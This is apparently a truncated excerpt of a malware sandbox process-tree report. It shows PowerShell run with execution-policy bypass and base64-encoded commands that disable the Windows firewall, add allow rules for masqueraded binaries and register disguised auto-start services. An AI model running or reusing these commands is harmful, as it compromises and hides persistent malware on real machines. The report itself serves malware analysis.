G4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAG0AeQBzAHQALQBsAGEAdQBuAGMAaABlAHIALQBhAG0AZAA2ADQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIABNAGEAbgBhAGcAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIABNAGEAbgBhAGcAZQByACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIABNAGEAbgBhAGcAZQByACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAG0AeQBzAHQALQBsAGEAdQBuAGMAaABlAHIALQBhAG0AZAA2ADQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAUwB5AG4AYwBoAHIAbwBuAGkAegBhAHQAaQBvAG4AIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFMAeQBuAGMAaAByAG8AbgBpAHoAYQB0AGkAbwBuACAAUwBlAHIAdgBpAGMAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdABjAHAAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdABjAHAAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABQAHUAYgBsAGkAYwAgAC0AUAByAG8AdABvAGMAbwBsACAAVABDAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAG0AeQBzAHQAXwBsAGEAdQBuAGMAaABlAHIAXwB1AGQAcAAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAG0AeQBzAHQAXwBsAGEAdQBuAGMAaABlAHIAXwB1AGQAcAAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwALgBtAHkAcwB0AGUAcgBpAHUAbQAtAGIAaQBuAFwAbQB5AHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAFAAdQBiAGwAaQBjACAALQBQAHIAbwB0AG8AYwBvAGwAIABVAEQAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBtAHkAcwB0AC4AZQB4AGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBtAHkAcwB0AC4AZQB4AGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABQAHUAYgBsAGkAYwAgAC0AUAByAG8AdABvAGMAbwBsACAAVABDAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAG0AeQBzAHQALgBlAHgAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwALgBtAHkAcwB0AGUAcgBpAHUAbQAtAGIAaQBuAFwAbQB5AHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAFAAdQBiAGwAaQBjACAALQBQAHIAbwB0AG8AYwBvAGwAIABVAEQAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ATABvAGMAYQBsAFAAbwByAHQAIAA4ADAALAAgADQANAAzACwAIAAyADAAMgAwACwAIAAyADQAMAA0ACwAIAAzADMAMwAzACwAIAA0ADQANAA0ACwAIAA1ADUANQA1ACwAIAA0ADQANAA5ACwAIAA0ADAANQAwACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AUAByAG8AdABvAGMAbwBsACAAVABDAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABDAG8AbgB0AHIAbwBsACIAIAAtAEcAcgBvAHUAcAAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAQwBvAG4AdAByAG8AbAAiACAALQBMAG8AYwBhAGwAUABvAHIAdAAgADgAMAAsACAANAA0ADMALAAgADIAMAAyADAALAAgADIANAAwADQALAAgADMAMwAzADMALAAgADQANAA0ADQALAAgADUANQA1ADUALAAgADQANAA0ADkALAAgADQAMAA1ADAAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFQAQwBQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAFMAZQB0AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFAAcgBvAGYAaQBsAGUAIAAtAFAAcgBvAGYAaQBsAGUAIABEAG8AbQBhAGkAbgAsAFAAdQBiAGwAaQBjACwAUAByAGkAdgBhAHQAZQAgAC0ARQBuAGEAYgBsAGUAZAAgAEYAYQBsAHMAZQAKAA==
        6⤵
        
        PID:5664
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:5780
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAcwBlAHIAdgBpAGMAZQBzACAAPQAgAEAAKAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAFAAcgBvAGcAcgBhAG0AcwBDAGEAYwBoAGUAIgA7ACAARABpAHMAcABsAGEAeQBOAGEAbQBlAD0AIgBDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAiADsAIABEAGUAcwBjAHIAaQBwAHQAaQBvAG4APQAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiADsAIABCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAPQAiACQAZQBuAHYAOgBQAFIATwBHAFIAQQBNAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAFIAZQBnAGUAZABpAHQAQwBhAGMAaABlACIAOwAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQA9ACIAUgBlAGcAaQBzAHQAcgB5ACAARQBkAGkAdABvAHIAIABDAGEAYwBoAGUAIABDAG8AbgB0AHIAbwBsACIAOwAgAEQAZQBzAGMAcgBpAHAAdABpAG8AbgA9ACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAEMAYQBjAGgAZQAgAFIAZQBnAGkAcwB0AHIAeQAgAFAAcgBvAGcAcgBhAG0AIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAOwAgAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQA9ACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAEQAZQB2AEEAcwBzAG8AYwBNAGEAbgAiADsAIABEAGkAcwBwAGwAYQB5AE4AYQBtAGUAPQAiAEQAZQB2AGkAYwBlACAAQQBzAHMAbwBjAGkAYQB0AGkAbwBuACAATQBhAG4AYQBnAGUAcgAiADsAIABEAGUAcwBjAHIAaQBwAHQAaQBvAG4APQAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABEAGUAdgBpAGMAZQAgAEEAcwBzAG8AYwBpAGEAdABpAG8AbgAgAE0AYQBuAGEAZwBlAHIAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgA7ACAAQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBOAGcAYwBDAHAAbQByAFMAdgBjACIAOwAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQA9ACIATQBpAGMAcgBvAHMAbwBmAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABQAGEAcwBzAHAAbwByAHQAIgA7ACAARABlAHMAYwByAGkAcAB0AGkAbwBuAD0AIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAATQBpAGMAcgBvAHMAbwBmAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABQAGEAcwBzAHAAbwByAHQAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgA7ACAAQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIAUgBlAG0AZQBkAHkAUAByAG8AYwAiADsAIABEAGkAcwBwAGwAYQB5AE4AYQBtAGUAPQAiAFIAZQBtAGUAZAB5ACAAUAByAG8AYwBlAHMAcwBlAHMAIgA7ACAARABlAHMAYwByAGkAcAB0AGkAbwBuAD0AIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAAUgBlAG0AZQBkAHkAIABQAHIAbwBjAGUAcwBzAGUAcwAgAE0AYQBuAGEAZwBlAHIAIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAOwAgAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQA9ACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAuAGUAeABlACIAfQAKACkACgAKAGYAbwByAGUAYQBjAGgAIAAoACQAcwBlAHIAdgBpAGMAZQAgAGkAbgAgACQAcwBlAHIAdgBpAGMAZQBzACkAIAB7AAoAIAAgACAAIABOAGUAdwAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBOAGEAbQBlACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACQAcwBlAHIAdgBpAGMAZQAuAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgAC0AUwB0AGEAcgB0AHUAcABUAHkAcABlACAAIgBBAHUAdABvAG0AYQB0AGkAYwAiACAALQBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUACgB9AAoA
        6⤵
        
        PID:5896
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:6012
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAYQBwAHAAQwBvAG0AcABhAHQAUABhAHQAaABzACAAPQAgAEAAKAAKAAkAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBV